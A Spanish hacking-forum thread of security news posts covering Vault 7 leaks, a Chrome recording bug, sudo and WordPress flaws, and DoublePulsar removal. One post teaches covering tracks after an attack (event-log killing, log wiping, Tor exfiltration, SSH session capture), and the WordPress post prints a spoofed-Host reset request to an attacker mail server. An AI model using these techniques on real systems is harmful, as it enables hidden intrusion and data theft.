      WikiLeaks ha revelado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, un "arma" que desde 2012 utiliza la CIA para afectar a los usuarios con WiFi en casas, oficinas de pequeñas y medianas empresas así como en espacios públicos. La CIA habría desarrollado esta herramienta con apoyo de la ONG SRI International.

      Cherry Blossom es un programa informático que afecta a los dispositivos de las redes inalámbricas, como routers para monitorear la actividad de sus usuarios y manipular su tráfico de Internet, aprovechando las vulnerabilidades de los dispositivos.


      Cherry Blossom puede instalarse en los dispositivos por vía inalámbrica, sin acceder a ellos físicamente, informa WikiLeaks. Una vez afectan a los dispositivos, los agentes de la CIA pueden realizar tareas de administración del sistema.



      Filtraciones anteriores en el marco de Vault 7:

         - El programa Pandemic permite instalar 'troyanos' en toda las computadoras de una red local que opera bajo Windows.
         - El programa espía Athena es capaz de controlar todo el sistema informático de Microsoft Windows, incluyendo la configuración y el manejo de tareas, para descargar o cargar archivos desde o hacia un directorio específico.
         - Los 'software' maliciosos AfterMidnight y Assassin están diseñados para operar dentro del sistema operativo Microsoft Windows, donde monitorean y reportan acciones en el equipo 'host' y ejecutan acciones especificadas por la CIA.
         - El 'malware' llamado Archimedes permite hacerse rápidamente con el control de las computadoras de una red de área local (LAN), haciéndose pasar por una sesión común y corriente de navegadores de Internet.
         - La herramienta Scribbles de laCIA permite etiquetar y rastrear documentos creados con el software de Microsoft Office filtrados por informantes o robados por "oficiales de Inteligencia extranjeros".
         - La herramienta Weeping Angel de la CIA puede grabar, enviar o almacenar audio a través del micrófono incorporado en las televisiones inteligentes de la serie F de Samsung.
         - El 'software' Dark Matter está diseñado para infectar productos de la compañía estadounidense Apple aún después de borrar el disco duro y reinstalar el sistema operativo del dispositivo.
         - El programa Marble 'disfraza' los 'hackeos' de la CIA impidiendo a los investigadores forenses atribuirles virus, troyanos y ataques cibernéticos.
         - El programa malicioso Hive es usado por la agencia para enviar información desde máquinas atacadas por la CIA y permite hacerse con su control para efectuar tareas específicas.
         - La herramienta Grasshopper, indetectable por la mayoría de programas antivirus, va destinada a crear datos dañinos de forma individual para el sistema Windows.



      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #30

      Ran Bar-Zik, desarrollador web en AOL, ha descubierto y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que permite a una página web grabar audio y vídeo sin que aparezca el correspondiente distintivo en la pestaña.

      A pesar de que incluso los sitios web maliciosos necesitan que el usuario les conceda permisos para poder acceder al micrófono y a la cámara, el bug hallado en Google Chrome abre la puerta a la creación de mecanismos para grabar audio y/o vídeo de forma malintencionada.

      Con el fin de saber qué página web está grabando audio o vídeo, Google Chrome muestra un distintivo con un círculo rojo en la pestaña correspondiente. Este círculo rojo es también un estándar utilizado para indicar que se está grabando, ya que lo podemos encontrar en muchas aplicaciones y dispositivos, incluido smartphones.

      Bar-Zik descubrió el fallo mientras trabajaba en un sitio web que ejecuta código No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, el cual es un protocolo para hacer streaming de audio y vídeo sobre Internet en tiempo real. Con el fin de darle más poder al usuario, el sitio web que lo implemente deberá pedir permisos para acceder a los componentes de grabación de vídeo y audio.



      Una vez que el usuario haya concedido los permisos, un código JavaScript se encarga de la grabación del audio y el vídeo, los cuales son luego enviados a través de Internet a los otros participantes mediante WebRTC. La API basada en JavaScript encargada de la grabación del contenido multimedia es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


      ¿Cómo es explotado el fallo?

      Bar-Zik ha descubierto que el código que realiza la grabación no tiene por qué estar necesariamente ejecutado en la pestaña original sobre la cual se concedieron los permisos. Debido a que la concesión abarca todo el dominio y no solo la pestaña, el investigador consiguió ejecutar el código para grabar audio y vídeo sobre una ventana emergente. Chrome no muestra el icono/distintivo de grabación sobre la barra de título, por lo que el usuario puede ser grabado sin que se esté dando cuenta.

      Además del No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, Bar-Zik también ha aportado una No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que permite descargar 20 segundos de audio grabado al usuario (no se almacena en ningún servidor externo) y una No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


      Enfrentamiento con Google

      Tras reportar el problema al gigante de Mountain View, Bar-Zik se encontró que Google no estaba dispuesta a reconocerlo como uno de seguridad, debido a que desde el punto de vista técnico no es uno que abarque dicha área.

      La compañía tiene razón, pero Bar-Zik insiste en su postura diciendo que los usuarios cansados podrían conceder permisos sin revisar bien a quiénes se los están concediendo, y esto sin contar a las personas que son imprudentes de por sí. Al no aparecer el distintivo, un usuario despistado o incauto podría no ser consciente de que le están grabando a pesar de haber dado los permisos.

      Aunque el escenario del ataque no está del todo claro, personas malintencionadas podrían derivar la grabación de audio y vídeo a diminutas ventanas emergentes que no mostrarían el distintivo debido a que este tendría que cargarse sobre la barra de título, cosa que de momento Chrome no es capaz de hacer (y también habría que ver las posibles limitaciones de los sistemas operativos en ese aspecto).

      Y esto no es todo, porque según el investigador, los atacantes no tendrían por qué crear sitios web maliciosos completos, sino que con solo explotar fallos de XSS en sitios web legítimos podrían tener acceso a la cámara y al micrófono de una víctima. El fallo de XSS tendría que suministrar el código del ataque para realizar la grabación.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #31

      Como parte del programa Vault7, que revela información secreta sobre el ciberespionaje global de la CIA, el portal No tienes permitido ver los links. Registrarse o Entrar a mi cuentaha publicado este primero de junio varios documentos referentes a otro otro proyecto de la inteligencia estadounidense denominado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, activo por lo menos hasta 2015.

      Pandemic funciona bajo el sistema operativo Windows e instala un implante persistente en cualquier sistema que esté compartiendo archivos en una red local.

      Para ello, el programa malicioso reemplaza temporalmente y on-the-fly el archivo al cual está accediendo el usuario e instala un troyano que permite acceder a información confidencial.

      Para ofuscar su actividad, el archivo original en el servidor permanece sin cambios; sólo se modifica o reemplaza mientras está en tránsito desde el servidor de archivos y antes de ser ejecutado en el equipo del usuario remoto. El implante permite la sustitución de hasta 20 programas con un tamaño máximo de 800 MB para una lista seleccionada de usuarios remotos (objetivos).

      Como su nombre sugiere, un solo ordenador en una red local con unidades compartidas infectadas con el implante "Pandémico" actuará como el "Paciente Cero" en la propagación de una enfermedad e infectará las computadoras remotas. Aunque no se indica explícitamente en los documentos publicados, parece técnicamente factible que los equipos remotos que proporcionan archivos compartidos se conviertan en nuevos servidores de archivos pandémicos en la red local para alcanzar nuevos objetivos.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #32
      El análisis forense es uno de esos campos que es tan importante como la defensa. Alguien dijo que hay dos tipos de empresas: aquellas que han sido comprometidas y aquellas que aún no saben que han sido comprometidas. Muchos expertos también recomiendan, sin dejar de lado una buena defensa, tener una buena estrategia de recuperación, porque no hay que preguntarse si vamos a ser comprometidos, sino cuando, y cuando esto ocurra ¿Cuál es tu plan? Por supuesto saber cómo hemos sido comprometidos es un requisito inamovible.


      La importancia de mantener nuestras habilidades y conocimientos al día es crucial. Por supuesto nada como enfrentarnos a escenarios reales, pero si no tienes la oportunidad de hacerlo, deberías al menos practicar con imgágenes preparadas para competiciones tipo CTF, etc.

      En la web de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta mantienen un buena No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con las que puedes prácticar de forma segura.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #33

      Hasta el día de hoy, no existe un estándar ampliamente aceptado para la seguridad de las aplicaciones para móviles. El objetivo del No tienes permitido ver los links. Registrarse o Entrar a mi cuenta es solucionar esta situación. El objetivo es liberar la guía en forma de libro electrónico gratuito y potencialmente un libro impreso para finales de este año.

      Además de un estándar de seguridad para aplicaciones móviles, el grupo de trabajo dirigido por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y No tienes permitido ver los links. Registrarse o Entrar a mi cuenta están produciendo una guía de pruebas exhaustivas que cubren los procesos, técnicas y herramientas utilizados durante una prueba de seguridad de aplicaciones para móviles, así como un conjunto de casos de prueba que permite a los analistas ofrecer resultados con información coherente y completa.

      El objetivo inicial es completar un primer borrador de la Mobile Security Testing Guide (MSTG) y las tareas incluyen:

          - Escribir el contenido original, los procesos de prueba y los casos de prueba.
          - Revisión y edición técnica para mejorar la calidad general del MSTG.


      Capítulos asociados en el MSTG:

      General / OS-independent

          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


      Android

          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


      iOS

          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


      Associated chapters in the MSTG

          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



      El estado actual de la guía está muy avanzando y sirve de consulta pero No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a los grupos de trabajo organizados en torno a los principales temas tratados en la guía.



      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


      PD: podeis encontrar el repositorio con todo el contenido No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
      #34

      Red Hat, Debian, Ubuntu, SUSE y otras distribuciones de Linux lanzaron parches para una vulnerabilidad de severidad alta en "sudo", la cualpodría ser abusada por un atacante local para obtener privilegios de root. Se ven afectadas las versiones de sudo 1.8.6p7 a 1.8.20. Los usuarios deben actualizar a sudo 1.8.20p1.

      Sudo es un comando de sistemas *NIX que permite a los usuarios estándar ejecutar comandos específicos con permisos de superusuario, como agregar usuarios o realizar actualizaciones del sistema.

      En este caso, los investigadores de Qualys encontraron una vulnerabilidad (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) en la función get_process_ttyname() de sudo que permite a un atacante local con privilegios de sudoer ejecutar comandos como root o elevar sus privilegios.

      LaNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta dice que SELinux debe estar habilitado y sudo compilado con el soporte de SELinux para que la vulnerabilidad se active. "En un sistema con SELinux habilitado, si un usuario es Sudoer para un comando sobre el cual no tiene privilegios completos de root, puede sobrescribir cualquier archivo del sistema de archivos con la ejecución de un comando" dijeron los investigadores de Qualys.

      Este problema, si se explota, permite al atacante eludir los controles y hacer más de lo que se supone que debería hacer. El atacante ya debe estar delante del mismo sistema y tener acceso a la consola.

      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para Red Hat Enterprise Linux 6, Red Hat Enterprise Linux Server y Red Hat Enterprise Linux 7. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Wheezy, Jessie y Sid. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta todos sus productos.

      Qualys dijo que publicará el exploit una vez que todos los sistemas hayan tenido tiempo de parchear.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #35

      Cuando se realiza un ataque informático que puede tener consecuencias legales o de otro tipo, uno de los puntos claves en los que se suele cometer un error, es en no limpiar bien nuestro rastro. En este post explicaré el funcionamiento de un conjunto de scripts que nos ayudarán a automatizar parte del proceso.

      Como existen diversos entornos, utilizaremos Freedom Fighting, una suite de scripts, para sistemas Linux. Para Windows, usaremos Invoke-Phant0m, un script escrito en PowerShell.







      Invoke-Phant0m:

      Se trata de un script en PowerShell dirigido al servicio de Registro de Sucesos de Windows (svchost.exe) debido a que es el principal proceso del que se puede obtener información de un atacante en un sistema de este tipo.
      El proceso svchost es indispensable en la ejecución de los procesos de servicios compartidos, donde varios servicios comparten procesos con el fin de reducir el uso de recursos del sistema. Esto puede suponer un problema complejo de seguridad al diseñar el sistema operativo.

      Podemos obtener Invoke-Phant0m de su repositorio Github: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

      Los procesos que lleva a cabo Invoke-Phant0m son los siguientes:

           
      • Detecta el proceso del servicio de registro de sucesos de Windows en el sistema operativo de destino.
      • Obtiene la lista de subprocesos e identifica los ID del subproceso del servicio de registro de sucesos de Windows.
      • Elimina todos los subprocesos sobre el servicio de registro de sucesos de Windows.

      Es decir, si se ejecuta correctamente, el Servicio Registro de Sucesos de Windows dejará de funcionar, por lo que el sistema de destino no será capaz de recopilar ni enviar los registros, pero aparecerá en ejecución aunque no este activo porque no se ha detenido el proceso svchost.exe para el Servicio de Registro de Sucesos de Windows, pero si los subprocesos relacionados. Esta es la principal ventaja y el propósito de Phant0m's. El servicio se detiene, pero todo parece estar funcionando.


      Para usarlo unicamente debemos ejecutar el script, tras importar el módulo.

      Código: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Más info: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Video de uso:






      Freedom Fighting:

      Se trata de un set con diversas funciones que pueden ser necesarias en la explotación de un sistema cuando no se quiere dejar rastro. Consta de tres scripts de los que explicaremos su uso y funcionamiento:
      Para descargarlo, clonamos su repositorio Github:

      Código: bash
      git clone https://github.com/JusticeRage/freedomfighting.git





      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:

      Este script se encarga de eliminar los logs incriminatorios de las carpetas:

           
      • /var/run/utmp, /var/log/wtmp, /var/log/btmp
      • /var/log/lastlog
      • /var/**/*.log
      • Cualquier carpeta indicada por el usuario
      Las entradas se eliminan en función de una dirección IP y/o del nombre de host asociado. Una característica útil del script, es que permite que los registros continúen escribiéndose después de haber sido manipulados, eliminando así la sospecha de que cualquier fichero de log haya sido modificado. Todo el trabajo se lleva a cabo en una unidad tmpfs y los archivos creados se limpian con seguridad.

      Con el comando /nojail.py --help obtenemos los parámetros que le podemos pasar. Como podeís observar, el uso es bastante sencillo.

      Código: bash
      usage: nojail.py [-h] [--user USER] [--ip IP] [--hostname HOSTNAME]
                          [--verbose] [--check]
                          [log_files [log_files ...]]

         Stealthy log file cleaner.

         positional arguments:
           log_files             Specify any log files to clean in addition to
                                 /var/**/*.log.

         optional arguments:
           -h, --help            show this help message and exit
           --user USER, -u USER  The username to remove from the connexion logs.
           --ip IP, -i IP        The IP address to remove from the logs.
           --hostname HOSTNAME   The hostname of the user to wipe. Defaults to the rDNS
                                 of the IP.
           --verbose, -v         Print debug messages.
           --check, -c           If present, the user will be asked to confirm each
                                 deletion from the logs.
           --daemonize, -d       Start in the background and delete logs when the
                                 current session terminates. Implies --self-delete.
           --self-delete, -s     Automatically delete the script after its execution.



      Por defecto, si no se proporcionan argumentos, el script intentará determinar la dirección IP basada en la variable de entorno SSH_CONNECTION. Cualquier entrada que coincida con el DNS inverso de ese IP también se eliminará.




      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:

      En ocasiones, se necesita subir un archivo de una máquina comprometida a un host o un servicio de terceros. Esto puede poner en peligro nuestro anonimato y además, pocos servicios permiten la subida de archivos desde la consola, o lo hacen de forma complicada. Para ello se ha creado este script, que se encarga de encriptar los archivos en AES-256-CBC simétrico y utilizar torify antes de subirlos.
      Únicamente utiliza las librerias openssl y curl o wget.


      Ejemplo de uso:
      Código: bash
      root@proxy:~# ./share.sh ~/file_to_share "My_Secure_Encryption_Key!"
      Success! Retrieval command: ./share.sh -r file_to_share "My_Secure_Encryption_Key!" https://transfer.sh/BQPFz/28239
      root@proxy:~# ./share.sh -r file_to_share "My_Secure_Encryption_Key!" https://transfer.sh/BQPFz/28239
      File retrieved successfully!


      Se pueden pasar argumentos adicionales que permiten controlar el número máximo de descargas permitido para el archivo (-m) y cuántos días No tienes permitido ver los links. Registrarse o Entrar a mi cuenta lo mantendrá (-d). El valor predeterminado para ambas opciones es 1. Es recomendable no usar espacios en la key, ya que es posible que solo reconozca la primera palabra.




      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:

      El script utiliza el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para recaudar datos de cualquier sesion creada a traves de SSH. Funciona auditando conexiones exitosas en el fichero auth.log calcula el PID del proceso bash del usuario y deja el resto a shelljack.

      Para usarlo solo tienes que lanzarlo en una terminal y esperar a que otros usuarios inicien sesion. Los datos de sus sesiones se guradarán en  /root/.local/sj.log.[user].[timestamp]







      Espero que os sea útil. Un saludo, HATI  ;D
      #36

      WikiLeaks publicó un nuevo lote de información de la CIA, detallando dos aparentes frameworks de malware desarrollados por la "Compañia"y para la plataforma Microsoft Windows. Este lote es el octavo lanzamiento de la serie Vault 7.


      AfterMidnight

      Apodado "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" y "Assassin", ambos programas de malware están diseñados para supervisar y reportar acciones en un equipo  remoto infectado y ejecutar acciones malintencionadas especificadas por la CIA.


      Según WikiLeaks, AfterMidnight permite a sus operadores ejecutar malware en un sistema remoto. El controlador principal se disfrazada como un archivo dinámico de Windows (DLL) y ejecuta "Gremlins", que son pequeños payload que permanecen ocultos y prestan diversos "servicios" a otros Gremlins.

      Una vez instalado en una máquina, AfterMidnight utiliza un sistema llamado "Octupus" HTTPS-based Listening Post (LP) para comprobar si hay eventos programados. Si se encuentra uno, el malware descarga y almacena todos los componentes necesarios y los nuevos Gremlins en memoria.

      De acuerdo con laNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta, el almacenamiento local relacionado con AfterMidnight se cifra con una clave que no se almacena en la máquina destino. Un payload especial, llamado "AlphaGremlin", contiene un lenguaje de script personalizado que permite a los operadores programar tareas personalizadas para ejecutar en el sistema infectado.


      Assassin

      Assassin es similar a AfterMidnight y se describe como "un implante automatizado que proporciona una plataforma de recolección de información en equipos remotos que se ejecuta el sistema operativo Microsoft Windows".

      Una vez instalado, esta herramienta ejecuta un implante dentro de un proceso de servicio de Windows, permitiendo a los operadores realizar tareas maliciosas en la máquina infectada.

      Assassin consta de cuatro subsistemas: Builder, Implant, Command & Control, y ListeningPost (LP).

      El "Implante" proporciona la lógica y la funcionalidad básicas de esta herramienta en una máquina Windows víctima, incluidas las comunicaciones y la ejecución de tareas. Se configura mediante el Builder y se despliega en un equipo de destino a través de algún vector no definido.

      El "Builder" permite configurar el Implante antes de la implementación y proporciona una interfaz de línea de comandos personalizada para establecer su configuración.

      El subsistema "Comando & Control" actúa como una interfaz entre el operador y el Listening Post (LP), mientras que este LP permite al Implante comunicarse con el subsistema de comando y control a través de un servidor web.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #37

      Recientemente, el 3 de mayo, se publicó una nueva vulnerabilidad (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) que afecta a todas las versiones de Wordpress, incluyendo la última versión 4.7.4, que puede permitir a un atacante resetear remotamente la contraseña y acceder con cualquier usuario.

      La vulnerabilidad está en la página de solicitud de restablecimiento de contraseña, concretamente en la posibilidad de modificar el contenido de la variable SERVER_NAME en la función wp-includes/pluggable.php:

      Código: php
      if ( !isset( $from_email ) ) {

              // Get the site domain and get rid of www.
              $sitename = strtolower( $_SERVER['SERVER_NAME'] );
              if ( substr( $sitename, 0, 4 ) == 'www.' ) {
                      $sitename = substr( $sitename, 4 );
              }

              $from_email = 'wordpress@' . $sitename;
      }


      Wordpress utiliza la variable SERVER_NAME para formar la cabecera From/Return-Path del correo.  El problema es que la mayoría de los servidores web, como Apache, por defecto setean SERVER_NAME con el hostname provisto por el cliente (dentro de la cabecera HTTP_HOST):

      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

      Como SERVER_NAME puede ser modificado, se podrá cambiar el Host en la cabecera:

      Código: mail
      POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
      Host: injected-attackers-mxserver.com
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 56

      user_login=admin&amp;redirect_to=&amp;wp-submit=Get+New+Password


      y el resultado es que $from_email en Wordpress será:

      [email protected]

      De esta manera, se generará un correo saliente con esa dirección en From/Return-Path:

      Código: mail
      ------[ ejemplo de correo generado ]-----

      Subject: [CompanyX WP] Password Reset
      Return-Path: <[email protected]>
      From: WordPress <[email protected]>
      Message-ID: <[email protected]>
      X-Priority: 3
      MIME-Version: 1.0
      Content-Type: text/plain; charset=UTF-8
      Content-Transfer-Encoding: 8bit

      Someone requested that the password be reset for the following account:

      http://companyX-wp/wp/wordpress/

      Username: admin

      If this was a mistake, just ignore this email and nothing will happen.
      To reset your password, visit the following address:

      <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

      -------------------------------


      Si se intercepta este correo y/o se repele en destino para que sea enviado de vuelta a la dirección de correo maliciosa, se podrá obtener el enlace de reset y actuar en consecuencia.

      El autor contempla tres escenarios:

      - Si el atacante conoce previamente el buzón del usuario administrador, la dirección del buzón puede ser atacada por medio de DoS lo que hace que el correo de restablecimiento de contraseña sea rechazado o imposible de entregar. En este momento, el correo se enviará a la dirección construida por el atacante.

      - La característica "autoresponder" de algunos buzones devolverá el contenido del mensaje como un archivo adjunto al remitente.

      - Enviado repetidos mensajes para restablecer la contraseña al buzón de destino, forzando al usuario a responder a uno, cuando el contenido de la respuesta generalmente se refiere al cuerpo del mensaje anterior.

      En definitiva, si se conoce el administrador o la dirección de correo electrónico de cualquier usuario de destino, se puede obtener el enlace de restablecimiento de contraseña por estos u otros métodos y, por ende, restablecer la contraseña de la cuenta de cualquier usuario.

      De momento no hay una solución oficial, pero para paliar el problema se recomienda forzar un nombre estático para UseCanonicalName.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #38
      Android / cSploit:Análisis de redes y pentesting
      Mayo 04, 2017, 11:47:03 AM
      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      Autor: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

      ¿Que es cSploit?

      cSploit es una suite se seguridad para análisis de redes y pentesting desde el móvil.

      Con cSploit podrás mapear tu red,descubrir servicios activos, buscar vulnerabilidades,realizar ataques es MitM,manipular trafico de red en tiempo real,etc.. una joya ;)

      Instalacion

      Instalar cSploit es simple puesto que lo podemos instalar fácilmente desde fdroid, pero antes de instalarlo tenemos que tener en cuenta que necesitamos una serie de requisitos para que este funcione correctamente:

          - Telefono rooteado
          - BusyBox instalado

      cSploit necesita que seas root del teléfono, puesto que hace uso de funciones y comandos de root, que no están disponible de modo "normal" por defecto, cada modelo de teléfono tiene un modo para rootearlo, por lo que dejamos esto en tus manos ;) Busybox es conocido como la "navaja suiza" de los entornos linux, puesto que es un paquete que provee, la mayoría de las utilidades disponibles para sistemas linux de las que hace uso cSploit para hacer su "magia"

      Instalando Busybox

      Busybox este disponible en el market privativo de google, pero como nosotros hace tiempo que mandamos a freír gárgaras las gapps y sus "troyanos" vamos a mostrar un método alternativo para tener busybox en nuestros teléfonos:

          - Descargamos el sdk de android para disponer de adb como indicamos en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - Descargamos la versión apropiada de busybox para nuestra arquitectura de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
          - Usando adb montamos la partición del sistema con permisos de escritura

      Entramos en la shell del teléfono

      Citaradb shell

      Entramos como root para poder montar el sistema con permisos de escritura

      Código: php
       su


      montamos el sistema con permisos de escritura

      Código: php
      mount -o rw,remount,rw /system


      salimos del root y desde adb copiamos nuestro busybox a la tarjeta SD(por ejemplo)

      Código: php
      adb push busybox-armv7l /mnt/extSdCard


      Entramos como root al directorio del sistema y aplicamos permisos 755 al archivo

      Código: php
      cd /system/xbin


      Copiamos busybox a la carpeta del sistema

      Código: php
      cp busybox-armv7l /system/xbin


      Aplicamos los permisos necesarios al archivo

      Código: php
      chmod 7555 busybox-armv7l


      Instalamos busybox

      Código: php
      ./busybox-armv7l --install -s /system/xbin


      Reiniciamos

      Código: php
      reboot


      Una vez instalado, solo tenemos que conectarnos a una red wifi y empezar a trastear ofrece muchas herramientas y opciones que no vamos a tratar porque daría para otro articulo solo pongo algunos ejemplos:



      Seleccionamos  objetivo:
            - Elegimos modulo para ejecutar



            - Elegimos opcion de ataque





      Os podeis hacer una idea solo con los pantallas lo que nos ofrece esta magnifica herramienta que incluye soporte con mfm(Meta Sploit Framework) de base.

      Happy Hacking ;)
      #39

      Un príncipe nigeriano se conforma con los centavos que tienes en tu cuenta bancaria, pero el lituano Evaldas Rimasauskas aspiró a objetivos mucho, mucho más grandes. El pasado mes de marzo este hombre No tienes permitido ver los links. Registrarse o Entrar a mi cuenta por haber perpetrado una campaña de phishing queNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

      Ambas empresas habían elegido mantener sus identidades como un secreto, pero de acuerdo a No tienes permitido ver los links. Registrarse o Entrar a mi cuentase trataba de Google y Facebook. Ambas compañías terminaron admitiendo haber sido las víctimas del caso. Según las fuentes de Fortune, este tipo de estafas son más comunes de lo que se esperaría.

      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, Rimasauskas inició sus planes en 2013. Falsificó direcciones de email, recibos y sellos corporativos para hacerse pasar por el fabricante de hardware taiwanes Quanta Computer. Esta empresa distribuye suministros a varios gigantes de Sillicon Valley, como Apppe y Amazon.

      No tienes permitido ver los links. Registrarse o Entrar a mi cuenta con el mismo nombre que esa compañía asiática. A continuación, abrió cuentas mantenidas y controladas por él mismo en bancos de Chipre y Letonia. Después de eso, comenzó su timo de correo electrónico. Comenzó a enviar correos electrónicos de phishing a las compañías víctimas en nombre de la empresa asiática legítima. Debido a que la compañía falsa tenía el mismo nombre, las víctimas tomaron los correos electrónicos de phishing como legítimos.

      El objetivo de esto era engañar a las tecnológicas para que le pagaran por piezas de ordenadores, y el plan funcionó. En un periodo de dos años el impostor convenció a los departamentos de contabilidad de Google y Facebook de hacer transferencias de decenas de millones de dólares.

      Cuando las empresas se dieron cuenta de lo que estaba pasando, Rimasauskas ya se había hecho con unos 100 millones de dólares en pagos recibidos y supuestamente los guardó en varios bancos a través de Europa. Tanto Facebook como Google afirman haber recuperado la mayoría de los fondos y han estado cooperando con las autoridades.

      Evaldas Rimasauskas niega las acusaciones y se encuentra peleando por su extradición desde Lituania donde se está bajo custodia por las autoridades. La moraleja de la historia es que si dos de las empresas de tecnología más grandes del mundo pueden ser víctimas del scam, básicamente cualquiera es vulnerable y por ello es mejor tomar todas las medidas preventivas.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
      #40

      DoublePulsar es una puerta trasera que se aprovechaba de una vulnerabilidad en el protocolo SMB de Windows y que podía permitir a la NSA conectarse de forma remota a cualquier ssitema para recopilar información sobre él. Tan pronto como la vulnerabilidad se dio a conocer, Microsoft lanzó un parche de seguridad para sus sistemas operativos (desde Windows Vista hasta Windows 10) con el que evitar que esta vulnerabilidad pudiera ser utilizada de nuevo. Sin embargo, el parche no eliminaba la puerta trasera DoublePulsar, la cual sigue estando presente en miles de ordenadores por todo el mundo.

      Se ha publicado un script en Python, llamado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para detectar este backdoor y eliminarlo de los ordenadores infectados.

      Código: bash
      python detect_doublepulsar_smb.py –ip 192.168.1.1



      Si la herramienta no detecta amenaza en nuestro sistema no tenemos de qué preocuparnos, sin embargo, en caso de que la puerta trasera de la NSA esté en nuestro ordenador, el programa nos devolverá un mensaje como:

      DOUBLEPULSAR SMB IMPLANT DETECTED!!!


      En ese caso, el siguiente paso será identificar la amenaza y, para ello, vamos a teclear en el terminal:

      Código: bash
      python detect_doublepulsar_rdp.py –file ips.list –verbose –threads 1


      Tras unos segundos, una vez identificada la amenaza, el último paso será proceder con la eliminación de DoublePulsar utilizando el comando:

      Código: bash
      python2 detect_doublepulsar_smb.py –ip 192.168.1.1 –uninstall


      Una vez eliminada, no debemos olvidarnos de instalar los últimos parches de seguridad de Windows para solucionar esta vulnerabilidad y evitar que, a través de ella, nos vuelvan a infectar con DoublePulsar.


      Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta